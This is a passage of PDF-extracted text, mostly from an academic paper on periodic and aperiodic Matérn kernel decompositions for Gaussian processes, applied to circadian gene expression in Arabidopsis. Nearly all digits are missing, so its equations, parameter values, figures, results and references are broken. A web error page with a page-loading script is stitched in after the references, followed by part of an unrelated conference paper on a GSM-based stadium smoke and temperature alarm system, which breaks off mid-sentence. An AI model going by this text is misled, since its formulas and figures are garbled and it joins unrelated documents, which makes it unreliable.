structures that allow an appropriate decomposition in periodic and non-periodic sub- models in order to tackle periodicity estimation for pseudo-periodic signals. kernels of periodic and aperiodic subspaces the challenge of creating a pair of kernels that stand respectively for the periodic and aperiodic components of the signal can be tackled using the rkhs framework. we detail in this section how decomposing a rkhs into a subspace of periodic functions and its orthogonal complement leads to periodic and aperiodic sub-kernels. fourier basis in rkhs we assume in this section that the space hp spanned by a truncated fourier basis b(x)= ( sin ( π λ x ) ,...,cos ( π λ qx ))> ( ) is a subspace of the rkhs h. under this hypothesis, it is straightforward to confirm that the reproducing kernel of hp is kp(x,x ′)=b>(x)g− b(x′) ( ) where g is the gram matrix of b in h: gi,j = 〈 bi,bj 〉 h. hereafter, we will refer to kp as the periodic kernel. in practice, the computation of kp requires computation of the inner product between sine and cosine functions in h. we will see in the next section that these computa- tions can be done analytically for matérn kernels. for other kernels, a more comprehensive list of rkhs inner products can be found in berlinet & thomas-agnan ( , chap. ). the orthogonal complement of hp in h can be interpreted as a subspace ha of aperiodic functions. by construction, its kernel is ka =k−kp (berlinet & thomas-agnan, ). an illustration of the decomposition of matérn / kernels is given in fig. . the decomposition of the kernel comes with a decomposition of the associated gaussian process in to two independent processes and the overall decompositions can be summarised as follow: h=hp ⊥ +ha↔k=kp+ka↔y =yp y +ya. ( ) many stationary covariance functions depend on two parameters: a variance parameter σ , which represents the vertical scale of the process and a lengthscale parameter, `, which represents the horizontal scale of the process. the sub-kernels ka and kp inherit these parameters (through the gram matrix g for the latter). however, the decomposition k =kp+ka allows us to set the values of those parameters separately for each sub-kernel durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in order to increase the flexibility of the model. the new set of parameters of k is then (σ p ,`p,σ a ,`a) with an extra parameter λ if the period is not known. such reparametrisations of kp and ka induce changes in the norms of hp and ha. however, if the values of the parameters are not equal to zero or +∞, these spaces still consist of the same elements so hp∩ha =∅. this implies that the rkhs generated by kp+ka corresponds to hp+ha where the latter are still orthogonal but endowed with a different norm. nevertheless, the approach is philosophically different since we build h by adding two spaces orthogonally whereas in eq. ( ) we decompose an existing space h into orthogonal subspaces. decomposition in periodic and aperiodic sub-models the expression y =yp+ya of eq. ( ) allows to introduce two sub-models corresponding to conditional distributions: a periodic one yp(x)|y(x) = f and an aperiodic one ya(x)|y(x) = f. these two distributions are gaussian and their mean and variance are given by the usual gaussian process conditioning formulas mp(x)=e[yp(x)|y(x) = f]=kp(x,x)k(x,x) − f ma(x)=e[ya(x)|y(x) = f]=ka(x,x)k(x,x) − f, ( ) vp(x)=var[yp(x)|y(x) = f]=kp(x,x)−kp(x,x)k(x,x) − kp(x,x) va(x)=var[ya(x)|y(x) = f]=ka(x,x)−ka(x,x)k(x,x) − ka(x,x). ( ) the linearity of the expectation ensures that the sum of the sub-models means is equal to the full model mean: m(x)=e[yp(x)+ya(x)|y(x) = f]=e[yp(x)|y(x) = f]+e[ya(x)|y(x) = f] =mp(x)+ma(x) ( ) so mp and ma can be interpreted as the decomposition of m into it’s periodic and aperiodic components. however, there is no similar decomposition of the variance: v(x) =vp(x)+va(x) since yp and ya are not independent given the observations. the sub-models can be interpreted as usual gaussian process models with correlated noise. for example, mp is the best predictor based on kernel kp with an observational noise given by ka. for a detailed discussion on the decomposition of models based on a sum of kernels, see durrande, ginsbourger & roustant ( ). we now illustrate this model decomposition on the test function f (x)=sin(x)+x/ defined over [ , ]. figure shows the obtained model after estimating (σ p ,`p,σ a ,`a) of a decomposed matérn / kernel. in this example, the estimated values of the lengthscales are very different allowing the model to capture efficiently the periodic component of the signal and the low frequency trend. application to matÉrn kernels the matérn class of kernels provides a flexible class of stationary covariance functions for a gaussian process model. the family includes the infinitely smooth exponentiated quadratic (i.e., gaussian or squared exponential or radial basis function) kernel as well durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as the non-differentiable ornstein–uhlenbeck covariance. in this section, we show how the matérn class of covariance functions can be decomposed into periodic and aperiodic subspaces in the rkhs. matérn kernels k are stationary kernels, which means that they only depend on the distance between the points at which they are evaluated: k(x,y)= k̃(|x−y|). they are often introduced by the spectral density of k̃ (stein, ): s(ω)= ( (ν)` ν σ √ π (ν+ / )( ν)ν ( ν ` +ω )ν+ / )− . ( ) three parameters can be found in this equation: ν which tunes the differentiability of k̃, ` which corresponds to a lengthscale parameter and σ that is homogeneous to a variance. the actual expressions of matérn kernels are simple when the parameterν is half-integer. for ν= / , / , / we have k / (x,x ′)=σ exp ( − |x−x′| ` ) k / (x,x ′)=σ ( + √ |x−x′| ` ) exp ( − √ |x−x′| ` ) k / (x,x ′)=σ ( + √ |x−x′| ` + |x−x′| ` ) exp ( − √ |x−x′| ` ) . ( ) here the parameters ` and σ respectively correspond to a rescaling of the abscissa and or- dinate axis. for ν= / one can recognise the expression of the exponential kernel (i.e., the covariance of the ornstein–uhlenbeck process) and the limit case ν→∞ corresponds to the squared exponential covariance function (rasmussen & williams, ). as stated in porcu & stein ( theorem . ) and wendland ( ), the rkhs generated by kν coincides with the sobolev space w ν+ / . since the elements of the fourier basis are c∞, they belong to the sobolev space and thus to matérn rkhs. the hypothesis hp⊂h made in ‘kernels of periodic and aperiodic subspaces’ is thus fulfilled and all previous results apply. furthermore, the connection between matérn kernels and autoregressive processes allows us to derive the expression of the rkhs inner product. as detailed in appendix b, we obtain for an input space d=[a,b]: matérn / (exponential kernel) 〈 g,h 〉 h / = ` σ ∫ b a ( ` g+g ′ )( ` h+h′ ) dt+ σ g(a)h(a). ( ) matérn / 〈 g,h 〉 h / = ` √ σ ∫ b a ( ` g+ √ ` g ′+g ′′ )( ` h+ √ ` h′+h′′ ) dt + σ g(a)h(a)+ ` σ g ′(a)h′(a). ( ) durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. matérn / 〈 g,h 〉 h / = ∫ b a lt (g)lt (h)dt+ σ g(a)h(a)+ ` σ g(a)′′h′′(a) + ` σ ( g ′(a)h′(a)+ g ′′(a)h(a)+ g(a)h′′(a) ) ( ) where lt (g)= √ ` √ σ ( √ ` g(t)+ ` g ′(t)+ √ ` g ′′(t)+g ′′′(t) ) . although these expressions are direct consequences of doob ( ) and hájek ( ), they cannot be found in the literature to the best of our knowledge. the knowledge of these inner products allow us to compute the gram matrix g and thus the sub-kernels kp and ka. a result of great practical interest is that inner products between the basis functions have a closed form expression. indeed, all the elements of the basis can be written in the form cos(ωx+ϕ) and, using the notation lx for the linear operators in the inner product integrals (see eq. ( )), we obtain: lx(cos(ωx+ϕ))= ∑ i αicos(ωx+ϕ) (i) = ∑ i αiω icos ( ωx+ϕ+ iπ ) . ( ) the latter can be factorised in a single cosine ρcos(ωx+φ) with ρ= √ r c +r s , φ= { arcsin(rs/ρ) if rc ≥ arcsin(rs/ρ)+π if rc < ( ) where rc = ∑ i αiω icos ( ϕ+ iπ ) and rs= ∑ i αiω isin ( ϕ+ iπ ) . eventually, the computation of the inner product between functions of the basis boils down to the integration of a product of two cosines, which can be solved by linearisation. quantifying the periodicity the decomposition of the model into a sum of sub-models is useful for quantifying the periodicity of the pseudo-periodic signals. in this section, we propose a criterion based on the ratio of signal variance explained by the sub-models. in sensitivity analysis, a common approach for measuring the effect of a set of variables x ,...,xn on the output of a multivariate function f (x ,...,xn) is to introduce a random vector r=(r ,...,rn) with values in the input space of f and to define the variance explained by a subset of variables xi = (xi ,...,xim) as vi =var ( e ( f (r)|ri )) (oakley & o’hagan, ). furthermore, the prediction variance of the gaussian process model can be taken into account by computing the indices based on random paths of the conditional gaussian process (marrel et al., ). durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we now apply these two principles to define a periodicity ratio based on the sub-models. let r be a random variable defined over the input space and yp, ya be the periodic and aperiodic components of the conditional process y given the data-points. yp and ya are normally distributed with respective mean and variance (mp, vp), (ma, va) and their covariance is given by cov(yp(x),ya(x′))=−kp(x,x)k(x,x)− ka(x′). to quantify the periodicity of the signal we introduce the following periodicity ratio: s= varr[yp(r)] varr[yp(r)+ya(r)] . ( ) note that s cannot be interpreted as a the percentage of periodicity of the signal in a rigorous way since varr[yp(r)+ya(r)] =varr[yp(r)]+varr[ya(r)]. as a consequence, this ratio can be greater than . for the model shown in fig. , the mean and standard deviation of s are respectively . and . . application to gene expression analysis the h cycle of days can be observed in the oscillations of biological mechanisms at many spatial scales. this phenomenon, called the circadian rhythm, can for example be seen at a microscopic level on gene expression changes within cells and tissues. the cellular mechanism ensuring this periodic behaviour is called the circadian clock. for arabidopsis, which is a widely used organism in plant biology and genetics, the study of the circadian clock at a gene level shows an auto-regulatory system involving several genes (ding et al., ). as argued by edwards et al. ( ), it is believed that the genes involved in the oscillatory mechanism have a cyclic expression so the detection of periodically expressed genes is of great interest for completing current models. within each cell, protein-coding genes are transcribed into messenger rna molecules which are used for protein synthesis. to quantify the expression of a specific protein-coding gene it is possible to measure the concentration of messenger rna molecules associated with this gene. microarray analysis and rna-sequencing are two examples of methods that take advantage of this principle. the dataset (see http://millar.bio.ed.ac.uk/data.htm) considered here was originally studied by edwards et al. ( ). it corresponds to gene expression for nine day old arabidopsis seedlings. after eight days under a h-light/ h-dark cycle, the seedlings are transferred into constant light. a microarray analysis is performed every four hours, from to h after the last dark-light transition, to monitor the expression of , genes. edwards et al. ( ) use cosopt (straume, ) for detecting periodic genes and identify a subset of , periodically expressed genes, with an estimated period between and h. we now apply to this dataset the method described in the previous sections. the kernel we consider is a sum of a periodic and aperiodic matérn / kernel plus a delta function to reflect observation noise: k(x,x′)=σ p kp(x,x ′)+σ a ka(x,x ′)+τ δ(x,x′). ( ) durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://millar.bio.ed.ac.uk/data.htm http://dx.doi.org/ . /peerj-cs. figure distribution of the periodicity ratio over all genes according to the gaussian process mod- els. the cut-off ratio determining if genes are labelled as periodic or not is represented by a vertical dashed line. although the cycle of the circadian clock is known to be around h, circadian rhythms often depart from this figure (indeed circa dia is latin for around a day) so we estimated the parameter λ to determine the actual period. the final parametrisation of k is based on six variables: (σ p ,`p,σ a ,`a,τ ,λ). for each gene, the values of these parameters are estimated using maximum likelihood. the optimization is based on the standard options of the gpy toolkit with the following boundary limits for the parameters: σp, σa≥ ; `p, `a∈[ , ]; τ ∈[ − , . ]and λ∈[ , ]. furthermore, random restarts are performed for each optimization to limit the effects of local minima. eventually, the periodicity of each model is assessed with the ratio s given by eq. ( ). as this ratio is a random variable, we approximate the expectation of s with the mean value of , realisations. to obtain results comparable with the original paper on this dataset, we labeled as periodic the set of , genes with the highest periodicity ratio. the cut-off periodicity ratio associated with this quantile is s= . . as can be seen in fig. , this cut-off value does not appear to be of particular significance according to the distribution of the gaussian process models. on the other hand, the distribution spike that can be seen at s= corresponds to a gap between models that are fully-periodic and others. we believe this gap is due to the maximum likelihood estimation since the estimate of σ a is zero for all models in the bin s= . the other spike at s= can be interpreted similarly and it corresponds to estimated σ p equal to zero. durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table confusion table associated to the predictions by cosopt and the proposed gaussian process approach. # of genes pgp pgp pcosopt , , pcosopt , , figure comparison of estimated periods for the genes in pgp ∩ pcosopt . the coefficient of determi- nation of x →x (dashed line) is . . let pcosopt and pgp be the sets of selected periodic genes respectively by edwards et al. ( ) and the method presented here and let pcosopt and pgp denote their complements. the overlap between these sets is summarised in table . although the results cannot be compared to any ground truth, the methods seem coherent since % of the genes share the same label. furthermore, the estimated value of the period λ is consistent for the genes labelled as periodic by the two methods, as seen in fig. . one interesting comparison between the two methods is to examine the genes that are classified differently. the available data from edwards et al. ( ) allows focusing on the worst classification mistakes made by one method according to the other. this is illustrated in fig. which shows the behaviour of the most periodically expressed genes in pgp according to cosopt and, conversely, the genes in pcosopt with the highest periodicity ratio s. although it is undeniable that the genes selected only by cosopt (fig. a) present some periodic component, they also show a strong non-periodic part, durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure examples of genes with different labels. (a) corresponds to genes labelled as periodic by cosopt but not by the gaussian process approach, whereas in (b) they are labelled as periodic only by the latter. in (a, b), the four selected genes are those with the highest periodic part according to the method that labels them as periodic. the titles of the graphs correspond to the name of the genes (agi convention). corresponding either to noise or trend. for these genes, the value of the periodicity ratio is: . ( . ), . ( . ), . ( . ), . ( . ) (means and standard deviations, clockwise from top left) which is close to the classification boundary. on the other hand, the genes selected only by the gaussian process approach show a strong periodic signal (we have for all genes s= . ( . )) with sharp spikes. we note from fig. b that there is always at least one observation associated with each spike, which ensures that the behaviour of the gaussian process models cannot simply be interpreted as overfitting. the reason cosopt is not able to identify these signals as periodic is that it is based on a single cosine function which makes it inadequate for fitting non sinusoidal periodic functions. this is typically the case for gene expressions with spikes as in fig. b, but it can also be seen on the test functions of fig. . this comparison shows very promising results, both for the capability of the proposed method to handle large datasets and for the quality of the results. furthermore, we believe that the spike shape of the newly discovered genes may be of particular interest for understanding the mechanism of the circadian clock. the full results, as well as the original dataset, can be found in the supplemental information. conclusion the main purpose of this article is to introduce a new approach for estimating, extracting and quantifying the periodic component of a pseudo-periodic function f given some noisy observations yi = f (xi)+ε. the proposed method is typical in that it corresponds to the orthogonal projection onto a basis of periodic functions. the originality here is to perform this projection in some rkhs where the partial knowledge given by the observations can durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. be dealt with elegantly. previous theoretical results from the mid- s allowed us to derive the expressions of the inner product of rkhs based on matérn kernels. given these results, it was then possible to define a periodic kernel kp and to decompose k as a sum of sub-kernels k=kp+ka. we illustrated three fundamental features of the proposed kernels for gaussian process modelling. first, as we have seen on the benchmark examples, they allowed us to approximate periodic non-sinusoidal patterns while retaining appropriate filtering of the noise. second, they provided a natural decomposition of the gaussian process model as a sum of periodic and aperiodic sub-models. third, they can be reparametrised to define a wider family of kernel which is of particular interest for decoupling the assumptions on the behaviour of the periodic and aperiodic part of the signal. the probabilistic interpretation of the decomposition in sub-models is of great importance when it comes to define a criterion that quantifies the periodicity of f while taking into account the uncertainty about it. this goal was achieved by applying methods commonly used in gaussian process based sensitivity analysis to define a periodicity ratio. although the proposed method can be applied to any time series data, this work has originally been motivated by the detection of periodically expressed genes. in practice, listing such genes is a key step for a better understanding of the circadian clock mechanism at the gene level. the effectiveness of the method is illustrated on such data in the last section. the results we obtained are consistent with the literature but they also feature some new genes with a strong periodic component. this suggests that the approach described here is not only theoretically elegant but also efficient in practice. as a final remark, we would like to stress that the proposed method is fully compatible with all the features of gaussian processes, from the combination of one-dimensional periodic kernels to obtain periodic kernels in higher dimension to the use of sparse methods when the number of observation becomes large. by implementing our new method within the gpy package for gaussian process inference we have access to these generalisations along with effective methods for parameter estimation. an interesting future direction would be to incorporate the proposed kernel into the ‘automated statistician’ project (lloyd et al., ; duvenaud et al., ), which searches over grammars of kernels. appendix a. details on test functions the test functions shown in fig. are -periodic. their expressions for x ∈[ , ) are (from top left, in a clockwise order): f (x)=cos( πx) f (x)= / cos( πx)+ / cos( πx) f (x)= { if x ∈[ , . ] − if x ∈( . , ) f (x)= |x− . |+ f (x)= − x f (x)= . ( ) durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. appendix b. norms in matÉrn rkhs autoregressive processes and rkhs norms a process is said to be autoregressive (ar) if the spectral density of the kernel s(ω)= π ∫ r k(t)e−iωt dt ( ) can be written as a function of the form s(ω)= ∣∣∑m k= αk(iω) k ∣∣ ( ) where the polynomial ∑m k= αkx k is real with no zeros in the right half of the complex plan doob ( ). hereafter we assume that m≥ and that α ,αm = . for such kernels, the inner product of the associated rkhs h is given by hájek ( ), kailath ( ) and parzen ( ) 〈 h,g 〉 h= ∫ b a (lt h)(lt g)dt+ ∑ ≤j,k≤m− j+k even dj,kh (j)(a)g(k)(a) ( ) where lt h= m∑ k= αkh (k)(t) and dj,k = min(j,k)∑ i=max( ,j+k+ −n) (− )(j−i)αiαj+k+ −i. we show in the next section that the matérn kernels correspond to autoregressive kernels and, for the usual values of ν, we derive the norm of the associated rkhs. application to matérn kernels following the pattern exposed in doob ( , p. ), the spectral density of a matérn kernel (eq. ( )) can be written as the density of an ar process when ν+ / is an integer. indeed, the roots of the polynomial ν ` +ω are conjugate pairs so it can be expressed as the squared module of a complex number ν ` +ω = ( ω+ i √ ν ` )( ω− i √ ν ` ) = ∣∣∣∣ω+ i √ ν ` ∣∣∣∣ . ( ) multiplying by i and taking the conjugate of the quantity inside the module, we finally obtain a polynomial in iω with all roots in the left half of the complex plan: ν ` +ω = ∣∣∣∣iω+ √ ν ` ∣∣∣∣ ⇒ ( ν ` +ω )(ν+ / ) = ∣∣∣∣∣∣ (√ ν ` +iω )(ν+ / )∣∣∣∣∣∣ . ( ) plugging this expression into eq. ( ), we obtain the desired expression of sν: sν(ω)= ∣∣∣∣√ (ν)` ν σ √π (ν+ / )( ν)ν (√ ν` +iω)(ν+ / ) ∣∣∣∣ . ( ) durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. using (ν)= ( ν− )! √ π ν− (ν− / )!, one can derive the following expression of the coefficients αk: αk = √ ( ν− )!νν σ (ν− / )! ν ckν+ / ( ` √ ν )k− / . ( ) theses values of αk can be plugged into eq. ( ) to obtain the expression of the rkhs inner product. the results for ν∈{ / , / , / } is given by eqs. ( )–( ) in the main body of the article. additional information and declarations funding support was provided by the biopredynproject (knowledge based bio-economy eu grant ref ) and the bbsrc grant bb/ / . james hensman was funded by an mrc career development fellowship. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: biopredynproject: ref . bbsrc: bb/ / . competing interests the authors declare there are no competing interests. author contributions • nicolas durrande and james hensman conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • magnus rattray and neil d. lawrence conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/sheffieldml. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references amaral i, johnston i. . circadian expression of clock and putative clock- controlled genes in skeletal muscle of the zebrafish. american journal of physiology ( ):r –r doi . /ajpregu. . . durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sheffieldml http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /ajpregu. . http://dx.doi.org/ . /peerj-cs. aronszajn n. . theory of reproducing kernels. transactions of the american mathematical society ( ): – doi . /s - - - - . berlinet a, thomas-agnan c. . reproducing kernel hilbert spaces in probability and statistics. dordrecht: kluwer academic publishers. ding z, doyle mr, amasino rm, davis sj. . a complex genetic interaction between arabidopsis thaliana toc and cca /lhy in driving the circadian clock and in output regulation. genetics ( ): – doi . /genetics. . . doob jl. . stochastic processes. vol. . new york: john wiley & sons. durrande n, ginsbourger d, roustant o. . additive covariance kernels for high- dimensional gaussian process modeling. annales de la faculté des sciences de toulouse xxi: – . duvenaud d, lloyd j, grosse r, tenenbaum j, zoubin g. . structure discovery in nonparametric regression through compositional kernel search. in: proceedings of the th international conference on machine learning, – . edwards kd, anderson pe, hall a, salathia ns, locke jcw, lynn jr, straume m, smith jq, millar aj. . flowering locus c mediates natural variation in the high-temperature response of the arabidopsis circadian clock. the plant cell online ( ): – doi . /tpc. . . hájek j. . on linear statistical problems in stochastic processes. czechoslovak mathematical journal ( ): – . hartley ho. . tests of significance in harmonic analysis. biometrika ( ): – doi . /biomet/ . - . . hughes m, ditacchio l, hayes k, vollmers c, pulivarthy s, baggs j, panda s, ho- genesch j. . harmonics of circadian gene transcription in mammals. plos genetics ( ):e doi . /journal.pgen. . kailath t. . rkhs approach to detection and estimation problems–i: deterministic signals in gaussian noise. ieee transactions on information theory ( ): – doi . /tit. . . leahy da, darbro w, elsner rf, weisskopf mc, kahn s, sutherland pg, grindlay je. . on searches for pulsed emission with application to four globular cluster x- ray sources-ngc , , , and . astrophysical journal : – doi . / . lloyd jr, duvenaud d, grosse r, tenenbaum j, ghahramani z. . automatic construction and natural-language description of nonparametric regression models. in: twenty-eighth aaai conference on artificial intelligence. palo alto: association for the advancement of artificial intelligence. marrel a, iooss b, laurent b, roustant o. . calculations of sobol indices for the gaussian process metamodel. reliability engineering & system safety ( ): – doi . /j.ress. . . . matheron g. . principles of geostatistics. economic geology ( ): – doi . /gsecongeo. . . . durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - - http://dx.doi.org/ . /genetics. . http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . /biomet/ . - . http://dx.doi.org/ . /biomet/ . - . http://dx.doi.org/ . /journal.pgen. http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j.ress. . . http://dx.doi.org/ . /j.ress. . . http://dx.doi.org/ . /gsecongeo. . . http://dx.doi.org/ . /gsecongeo. . . http://dx.doi.org/ . /peerj-cs. oakley je, o’hagan a. . probabilistic sensitivity analysis of complex models: a bayesian approach. journal of the royal statistical society: series b (statistical methodology) ( ): – doi . /j. - . . .x. parzen e. . an approach to time series analysis. the annals of mathematical statistics ( ): – . porcu e, stein ml. . on some local, global and regularity behaviour of some classes of covariance functions. berlin heidelberg: springer, – . rasmussen ce, williams c. . gaussian processes for machine learning. cambridge: mit press. scheuerer m, schaback r, schlather m. . interpolation of spatial data—a stochastic or a deterministic problem? technical report. universität göttingen. schuster a. . on the investigation of hidden periodicities with application to a supposed day period of meteorological phenomena. terrestrial magnetism ( ): – doi . /tm i p . stein ml. . interpolation of spatial data: some theory for kriging. berlin heidelberg: springer verlag. stellingwerf rf. . period determination using phase dispersion minimization. astrophysical journal : – doi . / . straume m. . dna microarray time series analysis: automated statistical assess- ment of circadian rhythms in gene expression patterning. methods in enzymology : – doi . /s - ( ) - . thomson w. . harmonic analyzer. proceedings of the royal society of london ( – ): – doi . /rspl. . . troutman bm. . some results in periodic autoregression. biometrika ( ): – doi . /biomet/ . . . vecchia av. . maximum likelihood estimation for periodic autoregressive moving average models. technometrics ( ): – doi . / . . . wahba g. . spline models for observational data. vol. . philadelphia: society for industrial mathematics. wendland h. . scattered data approximation. vol. . cambridge: cambridge university press. durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /tm i p http://dx.doi.org/ . / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /rspl. . http://dx.doi.org/ . /biomet/ . . http://dx.doi.org/ . /biomet/ . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) multi-function monitoring and alarm system for the large stadium wang xiaohui school of leisure management xi’an eurasia university xi’an, china e-mail: wangxiaohui@eurasia.edu dou xiaoning school of leisure management xi’an eurasia university xi’an, china e-mail: douxiaoning@eurasia.edu abstract—in the recent years, the safety problem in the large stadium has concerned by the researchers. especially during the period of the large sport, the safety problem of the stadium has become an important public event. this paper designs a multi-function monitoring and alarm system based on the mobile communication network. it could realize the smoke or combustible gas alarm, the infrared identification detection and the temperature alarm. it collects the data through the sensor and sends the data to the mobile phone or the control platform. the system has the characteristics of simple, convenient, safety, various functions and low cost. keywords-sensor; wireless transmission; alarm;, mcu; gsm i. introduction for the safety problem of the large sports venues, this paper introduces a multi-function alarm system based on the wireless communication system[ ]. it can realize the stadium smoke or combustible gas, the infrared detection and the temperature alarm. through the sensor and the wireless communication module, the collected data was send to the user or the main control platform. the system includes the minimum system based on stc c , sensor circuit composed of the ds b , hc-sr , mq- , gsm communication module and the lcd display circuit. the software system includes the main program, the gsm sms transceiver program, the display program and the temperature detection program[ ]. ii. overall design of the system a. the system function block the hardware system is composed by the smallest system of mcu, the gsm module, the display circuit, the buzzer control circuit and the sensor circuit[ ]. the sensor circuit is composed of three parts: the smoke detection, the human infrared detection and the temperature detection. it is showed in figure . clock circuit reset circuit stc c mcu gsm module display circuit sensor circuit control circuit buzzer alarm smoke detection circuit infrared detection circuit temperature detection circuit figure . system block diagram. from figure , when the three sensors detect the smoke, the human body or the high temperature, the alarm information is sent to the microcontroller. the microcontroller detects the alarm by judging the threshold of the buzzer circuit. then the gsm module sends the alarm message to the user. b. the design of the minimum system the minimum system of single chip microcomputer is composed of single chip microcomputer, crystal oscillator circuit and reset circuit[ ]. as shown in figure . p p p p p p p p p /rxd p /t p /txd p /int p /int p /t x reset x p p p p p p p p p p p p p p p p ea/vpp rd/p wr/p ale/prdg psen c pf c pf c pf x mhz l r . k stc c + + + figure . minimum system of the single chip. the principle of reset circuit is to reset the program manually when pressing the button, reset the program, and international conference on sensor network and computer engineering (icsnce ) restart it. in the crystal oscillator circuit, x provides oscillating signal for the crystal oscillator to the microcontroller, and the mcu runs into the running program. c. example sensor detection circuit ) temperature detection. the temperature of the environment is collected by ds b and the collected information is sent to the circuit through the interface. the temperature range is - ℃ ~+ ℃. the increment is . ℃ and the temperature can be turned into a number. the mcu can read the temperature directly. this temperature sensor reduces the external circuit and makes it easier to realize[ ]. the ds b consists of four parts: the bits rom with the single-wire interface, the temperature sensor, the temperature trigger and the configuration register. its structure is shown in figure . memory and controller bits rom and single-wire interface bits crc generator configuration register high temperature trigger low temperature trigger temperature sensor high speed cache memory figure . the internal block of ds b . through the single bus protocol, the single chip microcontroller reads the data and operations from the ds b . finally it is concluded the temperature value. the resistor in the circuit used for the pull-up, it has the ability of the anti-interference. ) smoke and combustible gas detection. the mq- smoke sensor is a kind of the air sensitive material with the tin oxide. it has the low conductivity in the clean air[ ]. therefore, in the surrounding environment, the conductivity of the sensor increases with the increase in the presence of the smoke or the combustible gas. lm is the operational amplifier which is used as a voltage comparator. when the input voltage v+ > v-, the output is high and the output is low when v- > v+. the mq- is the smoke sensor. in mq- , r and rv constitute the circuit. rv is a sliding resistor which adjusts the input voltage of lm . in general, when v+ >v-, outputs the high level. when the mq- detects the smoke or the combustible gas, its resistance decreases and the voltage is smaller, the v- voltage changed higher, so that the v+<v-. the lm outputs the low level, the light emitting diode conducts. the single chip microcomputer detects the low level, so as to start the alarm. the detection circuit of the smoke and combustible gas is shown in figure : lm out + - gnd vcc rv k r k r rv k r . k d c a h a b h b mq- vcc vcc figure . the circuit of the smoke and the combustible gas. ) human infrared detection with the hc-sr module, the system detects the human body. when the human body passes through the infrared detection zone, the mcu outputs the trigger signal to the wireless module. when no one is unmanned, the mcu is used to detect the high level through the pull resistance[ ]. hc-sr a gnd c a r sw r k k r q npn d vcc figure . the infrared detection circuit. hc-sr is the human body induction module. when it detects the human body, pin a outputs the high level. through the current limiting resistor, q turns on and the collector connects to the gnd and then switched to the low level. at this time, the light emitting diode conducts and the led lighting. the single chip microcomputer detects the low level and begins an alarm. in the circuit, the capacitance used as the filter, r is the pull-up resistor. when there is no person, the q turns off. the single chip microcomputer can detect the high level by the pull-up resistor. iii. software system design a. main program design the software of this system is designed with a single chip system program as the main program, and the sensor module international conference on sensor network and computer engineering (icsnce ) program is designed as the subroutine[ ]. the main program flow is shown in figure . start mcu initialization module initialization smoke detection detected smoke (y/n) send sms y end detected human (y/n) send sms send sms y y n temperature detection temperature >threshold infrared detection n n figure . main program of the systemm. at first, the mcu initializes and then the temperature module, the human infrared module and the smoke alarm module are also initialized. if the system detects the smoke, sends the message to the mobile phone or determines whether the temperature exceeds the threshold value. if it exceeds it, send data to the user or judge the results of the human detected. if detects the human body sends the data to the mobile phone or not. b. gsm module program design the program design of this part is the design of serial communication of gsm[ ]. first, port, baud rate, parity bit, data bit and so on are first set up, then the short message is sent by tc at command. the flow of its program is shown in figure . start mcu iniatialization module iniatialization com interrupt end receive“ring” send the command“ath” delay send message receive #open# relay turn on led turn on receive #close# relay turn off led turn off y n n n n y y y figure . tc module program flow chart. the program began, gsm module initialization, serial port to determine whether to interrupt if the serial interrupt, and then determine whether to receive the "ring" command, if the received command is sent on command, if not to receive orders and then to determine whether the received switch command, if the #open# is received, the control relay is closed, led lights, if received the #close# command, control relay off, led lamp. iv. test result and data analysis when the system detects the data exceeds the threshold, the gsm module begin works. it send sms to the user or the main platform, which could transmit the data in time. in order to display the test results, uses the screen results of the mobile phone in figure . figure . gsm sending sms. users can send “open” and “close” command to control the working status of the system. if the “open” international conference on sensor network and computer engineering (icsnce ) command is 